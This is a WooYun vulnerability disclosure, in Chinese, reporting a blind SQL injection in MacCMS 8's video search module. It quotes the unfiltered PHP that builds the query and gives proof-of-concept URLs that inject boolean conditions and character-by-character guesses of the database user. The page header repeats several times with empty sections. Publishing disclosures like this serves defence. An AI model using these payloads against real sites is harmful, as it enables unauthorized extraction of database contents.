苹果cms8 sql盲注 | wooyun-2014-074281| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-074281

漏洞标题：苹果cms8 sql盲注

漏洞作者： menmen519

提交时间：2014-08-29 12:34

修复时间：2014-11-27 12:36

公开时间：2014-11-27 12:36

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-29：细节已通知厂商并且等待厂商处理中
2014-08-30：厂商已经确认，细节仅向厂商公开
2014-09-02：细节向第三方安全合作伙伴开放
2014-10-24：细节向核心白帽子及相关领域专家公开
2014-11-03：细节向普通白帽子公开
2014-11-13：细节向实习白帽子公开
2014-11-27：细节向公众公开

简要描述：

苹果cms8 sql盲注

详细说明：

module/vod.php:lines(154-176):

$tpl->P["des"] = $tpl->P["des"] . "&nbsp;Tag为" . $tpl->P["tag"];
		$tpl->P["where"] = $tpl->P["where"] . " AND instr(d_tag,'".$tpl->P['tag']."')>0 ";
	}
    $tpl->P['typepid'] = 0;
	if(!isN($tpl->P["typeid"])){
		$typearr = $MAC_CACHE['vodtype'][$tpl->P['typeid']];
		if (is_array($typearr)){
			$tpl->P['typepid'] = $typearr['t_pid'];
			if (isN($tpl->P["key"])){ $tpl->P["key"]= $typearr["t_name"];  }
			$tpl->P["des"] = $tpl->P["des"] . "&nbsp;分类为" . $typearr["t_name"];
			$tpl->P["where"] = $tpl->P["where"] . " AND d_type in (" . $typearr["childids"] . ") ";
		}
		
		unset($typearr);
	}
	if(!isN($tpl->P["classid"])){
		$classarr = $MAC_CACHE['vodclass'][$tpl->P['classid']];
		if (is_array($classarr)){
			if (isN($tpl->P["key"])){ $tpl->P["key"]= $classarr["c_name"];  }
			$tpl->P["des"] = $tpl->P["des"] . "&nbsp;剧情分类为" . $classarr["c_name"];
			$tpl->P["where"] = $tpl->P["where"] .  ' AND instr(d_class,\','.$tpl->P['classid'].',\')>0  ';
		}

发现这里$tpl->P["where"] = $tpl->P["where"] . 直接操作而且没有过滤，这里我们由于360safe的作用，导致union select 的类型无法操作，那么我们可以试试盲注猜解方法，一般的视频站点有初始值，我们的站点没有，我们在数据库加入一条：

我们发送这样的一个url:
http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-sdsdsd-typeid-1-classid-32-where- and 0%23.html
当条件为0的时候就是不成立，那么我们页面显示就是0条记录，默认情况下就是1条记录，这样我们就可以通过这样的url进行猜测
如图所示:

http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-sdsdsd-typeid-1-classid-32-where- and if(ascii(substr(user(),1,1))=$NUM,1,0)%23.html
然后我们就能获取数据库信息

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-08-30 11:43

厂商回复：

已经确认此漏洞，稍后修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-074281

漏洞标题：苹果cms8 sql盲注

相关厂商：maccms.com

漏洞作者： menmen519

提交时间：2014-08-29 12:34

修复时间：2014-11-27 12:36

公开时间：2014-11-27 12:36

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-074281

漏洞标题：苹果cms8 sql盲注

相关厂商：maccms.com

漏洞作者： menmen519

提交时间：2014-08-29 12:34

修复时间：2014-11-27 12:36

公开时间：2014-11-27 12:36

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-074281"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：